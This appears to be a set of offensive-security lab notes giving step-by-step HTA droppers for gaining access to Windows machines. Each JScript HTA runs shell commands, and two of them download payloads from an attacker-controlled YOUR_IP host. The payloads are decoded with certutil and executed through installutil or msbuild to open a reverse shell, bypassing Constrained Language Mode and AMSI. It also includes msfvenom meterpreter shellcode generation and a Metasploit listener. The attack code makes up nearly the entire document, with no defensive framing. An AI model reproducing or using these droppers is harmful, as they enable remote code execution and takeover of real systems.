<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n YOUR_IP");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
To catch the ping
sudo tcpdump -i tun0 icmp
Compile the project https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM
Convert to psby.txt using certutil
certutil -encode "Z:\\tools\\02.CLM\\revshell\\PSBypassCLM\\PSBypassCLM\\bin\\x64\\Release\\PsBypassCLM.exe" psby.txt
Download the psby.txt on the kali host and serve the file with a dropper
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("powershell iwr -uri http://YOUR_IP/psby.txt -outfile C:\\\\windows\\\\tasks\\\\enc.txt; powershell certutil -decode C:\\\\windows\\\\tasks\\\\enc.txt C:\\\\windows\\\\tasks\\\\psby.exe; C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\installutil.exe /logfile= /LogToConsole=true /revshell=true /rhost=YOUR_IP /rport=443 /amsi=0 /U C:\\\\windows\\\\tasks\\\\psby.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Generate the shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f csharp EXITFUNC=thread
Run it through XORme
Update hollow.xml with the code from above
Set up listener
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j"
Deliver it
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("powershell iwr -uri http://YOUR_IP/hollow.xml -outfile C:\\\\windows\\\\tasks\\\\hollow.xml; C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\msbuild.exe C:\\\\windows\\\\tasks\\\\hollow.xml");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>